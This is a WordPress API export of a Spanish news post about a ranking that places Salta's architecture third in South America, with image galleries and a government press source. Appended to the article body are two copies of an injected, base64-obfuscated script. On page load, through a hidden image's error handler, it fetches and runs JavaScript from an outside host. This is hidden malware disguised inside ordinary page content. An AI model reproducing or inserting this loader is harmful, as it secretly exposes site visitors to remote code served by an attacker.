{"id":3088,"date":"2023-09-11T11:40:10","date_gmt":"2023-09-11T14:40:10","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3088"},"modified":"2025-08-14T00:08:41","modified_gmt":"2025-08-14T03:08:41","slug":"la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3088","title":{"rendered":"La arquitectura de Salta est\u00e1 en el podio de Sudam\u00e9rica"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#7d073a\"><em>Un sitio internacional dedicado a la arquitectura, elabor\u00f3 un ranking que toma en cuenta comentarios de turistas. La ciudad est\u00e1 primera en el pa\u00eds, tercera en Am\u00e9rica del Sur y 19 a nivel mundial.<\/em><\/h4>\n\n\n\n<p>La arquitectura de la ciudad de Salta es representativa de su rica historia desde sus or\u00edgenes en 1582, &nbsp;pero su riqueza urban\u00edstica no es solamente colonial, el patrimonio incluye ejemplos posteriores que le otorga una singularidad destacada por los millones de turistas que la visitan.<\/p>\n\n\n\n<p>El sitio internacional dedicado a la arquitectura, Buildworld, analiz\u00f3 rese\u00f1as tur\u00edsticas de lugares arquitect\u00f3nicos en cientos de ciudades para revelar qu\u00e9 zonas tienen la mayor concentraci\u00f3n de construcciones mejor valoradas.<\/p>\n\n\n\n<p>La ciudad de Salta ocupa el tercer puesto en Sudam\u00e9rica, luego de Quito y R\u00edo de Janeiro seg\u00fan el estudio revelado en https:\/\/www.buildworld.co.uk\/blog\/archives\/best-holiday-destinations-for-architecture-lovers.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8839-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8839-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica.jpg\" alt=\"La arquitectura de Salta est\u00e1 en el podio de Sudam\u00e9rica.\"\/><\/a><\/figure>\n\n\n\n<p>Buildworld identific\u00f3 las 10 principales ciudades de destino en cada pa\u00eds seg\u00fan la p\u00e1gina de Tripadvisor. Salta ocupa el primer lugar en Argentina, el tercero en Am\u00e9rica del Sur y 19 en el mundo.<\/p>\n\n\n\n<p>Algunos de los edificios emblem\u00e1ticos de la ciudad son la Catedral, la bas\u00edlica de San Francisco, el Hotel Salta, el Palacio Usandivaras, el Convento San Bernardo, el Cabildo Hist\u00f3rico, el Mercado Artesanal, El museo Explora Salta, entre otros edificios.<\/p>\n\n\n\n<p>En las calles de la ciudad conviven construcciones t\u00edpicas de por lo menos cinco grandes per\u00edodos de la arquitectura, con exponentes que asombran al visitante y enorgullecen a los propios salte\u00f1os.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"408\" height=\"600\" data-id=\"3091\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4521-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica.png\" alt=\"\" class=\"wp-image-3091\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4521-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica.png 408w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4521-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-204x300.png 204w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4521-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-286x420.png 286w\" sizes=\"(max-width: 408px) 100vw, 408px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"3090\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4522-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica.jpg\" alt=\"\" class=\"wp-image-3090\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4522-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4522-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4522-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4522-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4522-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"3089\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4523-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica.jpg\" alt=\"\" class=\"wp-image-3089\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4523-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4523-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4523-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4523-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4523-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"3092\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4524-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica.jpg\" alt=\"\" class=\"wp-image-3092\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4524-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4524-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4524-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4524-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4524-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"3094\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4525-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica.jpg\" alt=\"\" class=\"wp-image-3094\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4525-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4525-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4525-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4525-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4525-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"560\" height=\"373\" data-id=\"3093\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/91778-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica.jpg\" alt=\"\" class=\"wp-image-3093\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/91778-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/91778-la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-300x200.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-arquitectura-de-salta-esta-en-el-podio-de-sudamerica-91778\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Un sitio internacional dedicado a la arquitectura, elabor\u00f3 un ranking que toma en cuenta comentarios de turistas. La ciudad est\u00e1 primera en el pa\u00eds, tercera en Am\u00e9rica del Sur y 19 a nivel mundial. La arquitectura de la ciudad de Salta es representativa de su rica historia desde sus or\u00edgenes en 1582, &nbsp;pero su riqueza [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3093,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[22,18,6],"tags":[],"class_list":{"0":"post-3088","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-internacional","8":"category-rutas-y-caminos","9":"category-temas-relacionados"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3088"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3088"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3088\/revisions"}],"predecessor-version":[{"id":6967,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3088\/revisions\/6967"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3093"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3088"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3088"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3088"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}